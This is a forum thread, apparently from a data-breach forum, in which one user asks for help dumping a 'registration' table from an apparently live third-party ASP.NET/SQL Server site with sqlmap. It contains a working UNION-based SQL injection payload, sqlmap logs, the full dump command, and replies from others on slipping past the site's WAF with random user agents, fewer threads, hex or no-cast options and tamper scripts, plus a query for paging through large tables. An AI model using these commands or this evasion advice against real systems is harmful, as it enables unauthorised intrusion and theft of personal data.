Posts: 45 Threads: 0 Joined: N/A August 15, 2022 at 1:38 PM Almost 7hrs still waiting for the dump but no sign!
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 32 columns
Payload: id=4308' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(75)+CHAR(68)+CHAR(73)+CHAR(67)+CHAR(98)+CHAR(117)+CHAR(103)+CHAR(120)+CHAR(68)+CHAR(109)+CHAR(69)+CHAR(68)+CHAR(117)+CHAR(121)+CHAR(107)+CHAR(70)+CHAR(121)+CHAR(76)+CHAR(88)+CHAR(66)+CHAR(70)+CHAR(78)+CHAR(122)+CHAR(83)+CHAR(89)+CHAR(68)+CHAR(83)+CHAR(110)+CHAR(115)+CHAR(105)+CHAR(86)+CHAR(122)+CHAR(106)+CHAR(85)+CHAR(87)+CHAR(82)+CHAR(68)+CHAR(101)+CHAR(72)+CHAR(72)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- FrFu
---
[12:30:09] [INFO] testing Microsoft SQL Server
[12:30:09] [INFO] confirming Microsoft SQL Server
[12:30:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2017
[12:30:09] [INFO] fetching columns for table 'registration' in database 'aaaaa_demo_live'
[12:30:09] [INFO] fetching entries for table 'registration' in database 'aaaaa_demo_live'
[12:30:17] [INFO] starting 10 threads
Posts: 35 Threads: 0 Joined: N/A August 15, 2022 at 1:39 PM 1. Lower the number of threads.
2. Did you use --random-agent?
3. Did you use a tamper script?
4. Did you try --hex or --no-cast?
5. Did you manually check if the WAF is dropping connections? Posts: 104 Threads: 0 Joined: N/A     August 15, 2022 at 1:41 PM (August 15, 2022, 01:39 PM)TheGoodlife Wrote: 1. Lower the number of threads.
2. Did you use --random-agent?
3. Did you use a tamper script?
4. Did you try --hex or --no-cast?
5. Did you manually check if the WAF is dropping connections? ^ all I wanted to say Posts: 45 Threads: 0 Joined: N/A August 15, 2022 at 1:43 PM (August 15, 2022, 01:39 PM)TheGoodlife Wrote: 1. Lower the number of threads.
2. Did you use --random-agent?
3. Did you use a tamper script?
4. Did you try --hex or --no-cast?
5. Did you manually check if the WAF is dropping connections? 1. Okay 2. yes 3. no 4. no 5. no python sqlmap.py -u "https://....aspx?id=82" -D aaaaa_demo_live -T registration --dump --output-dir=lol --dbms="Microsoft SQL Server" --random-agent --threads 10 --technique=U --batch Posts: 35 Threads: 0 Joined: N/A August 15, 2022 at 1:48 PM (August 15, 2022, 01:43 PM)arishsingh07 Wrote: (August 15, 2022, 01:39 PM)TheGoodlife Wrote: 1. Lower the number of threads.
2. Did you use --random-agent?
3. Did you use a tamper script?
4. Did you try --hex or --no-cast?
5. Did you manually check if the WAF is dropping connections?
1. Okay
2. yes
3. no
4. no
5. no
python sqlmap.py -u "https://....aspx?id=82" -D aaaaa_demo_live -T registration --dump --output-dir=lol --dbms="Microsoft SQL Server" --random-agent --threads 10 --technique=U --batch Why are you forcing a Union injection? Maybe other methods succeed instead. Turn off that --batch flag, you will need to manually adjust. Use --random-agent --threads=2 (or maximum 3) --hex and if that doesnt work, try using --tamper=between Posts: 45 Threads: 0 Joined: N/A August 15, 2022 at 1:51 PM (August 15, 2022, 01:48 PM)TheGoodlife Wrote: (August 15, 2022, 01:43 PM)arishsingh07 Wrote: (August 15, 2022, 01:39 PM)TheGoodlife Wrote: 1. Lower the number of threads.
2. Did you use --random-agent?
3. Did you use a tamper script?
4. Did you try --hex or --no-cast?
5. Did you manually check if the WAF is dropping connections?
1. Okay
2. yes
3. no
4. no
5. no
python sqlmap.py -u "https://....aspx?id=82" -D aaaaa_demo_live -T registration --dump --output-dir=lol --dbms="Microsoft SQL Server" --random-agent --threads 10 --technique=U --batch
Why are you forcing a Union injection? Maybe other methods succeed instead. Turn off that --batch flag, you will need to manually adjust. Use --random-agent --threads=2 (or maximum 3) --hex
and if that doesnt work, try using --tamper=between Thanks, Okay let me try again
(August 15, 2022, 01:48 PM)TheGoodlife Wrote: (August 15, 2022, 01:43 PM)arishsingh07 Wrote: (August 15, 2022, 01:39 PM)TheGoodlife Wrote: 1. Lower the number of threads.
2. Did you use --random-agent?
3. Did you use a tamper script?
4. Did you try --hex or --no-cast?
5. Did you manually check if the WAF is dropping connections?
1. Okay
2. yes
3. no
4. no
5. no
python sqlmap.py -u "https://....aspx?id=82" -D aaaaa_demo_live -T registration --dump --output-dir=lol --dbms="Microsoft SQL Server" --random-agent --threads 10 --technique=U --batch
Why are you forcing a Union injection? Maybe other methods succeed instead. Turn off that --batch flag, you will need to manually adjust. Use --random-agent --threads=2 (or maximum 3) --hex
and if that doesnt work, try using --tamper=between [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS sqlmap resumed the following injection point(s) from stored session: I have to use tamper now Posts: 45 Threads: 0 Joined: N/A August 15, 2022 at 2:35 PM I found that I cant dump the reg table, now without tamper and hex by selecting the column dump.. Not satisfied toh but is somewhat working @ TheGoodlife [Thanks for your help] Thanks you to @ VapospicePosts: 35 Threads: 0 Joined: N/A August 15, 2022 at 2:37 PM (August 15, 2022, 02:35 PM)arishsingh07 Wrote: I found that I cant dump the reg table, now without tamper and hex by selecting the column dump.. Not satisfied toh but is somewhat working @TheGoodlife [Thanks for your help] Thanks you to @Vapospice try --no-cast instead of hex You need to play around with it. If you open the tamper folder in your SQLMap folder, you can open the tamperscripts and read what they do in the first few lines. Maybe one fits exactly your needs Posts: 45 Threads: 0 Joined: N/A August 15, 2022 at 2:41 PM (August 15, 2022, 02:37 PM)TheGoodlife Wrote: (August 15, 2022, 02:35 PM)arishsingh07 Wrote: I found that I cant dump the reg table, now without tamper and hex by selecting the column dump.. Not satisfied toh but is somewhat working @TheGoodlife [Thanks for your help] Thanks you to @Vapospice
try --no-cast instead of hex
You need to play around with it. If you open the tamper folder in your SQLMap folder, you can open the tamperscripts and read what they do in the first few lines. Maybe one fits exactly your needs Got it.. Thanks for your suggestion.
Do you like to help me in this problem also? @ TheGoodlife[how to add limits using where] with a url example like https://example.com....?id=82 [how to add limits] https://breached.to/Thread-sqlmap-dump-tables-with-more-than-one-million-how Posts: 35 Threads: 0 Joined: N/A August 15, 2022 at 2:49 PM (August 15, 2022, 02:41 PM)arishsingh07 Wrote: (August 15, 2022, 02:37 PM)TheGoodlife Wrote: (August 15, 2022, 02:35 PM)arishsingh07 Wrote: I found that I cant dump the reg table, now without tamper and hex by selecting the column dump.. Not satisfied toh but is somewhat working @TheGoodlife [Thanks for your help] Thanks you to @Vapospice
try --no-cast instead of hex
You need to play around with it. If you open the tamper folder in your SQLMap folder, you can open the tamperscripts and read what they do in the first few lines. Maybe one fits exactly your needs
Got it.. Thanks for your suggestion.
Do you like to help me in this problem also?
@TheGoodlife
[how to add limits using where]
with a url example like https://example.com....?id=82 [how to add limits]
https://breached.to/Thread-sqlmap-dump-tables-with-more-than-one-million-how That is quite complicated without knowing the backend. You could try manual SQL:
--sql-query="use db; SELECT * FROM table OFFSET 5000 ROWS FETCH NEXT 4000 ROWS ONLY;"
|
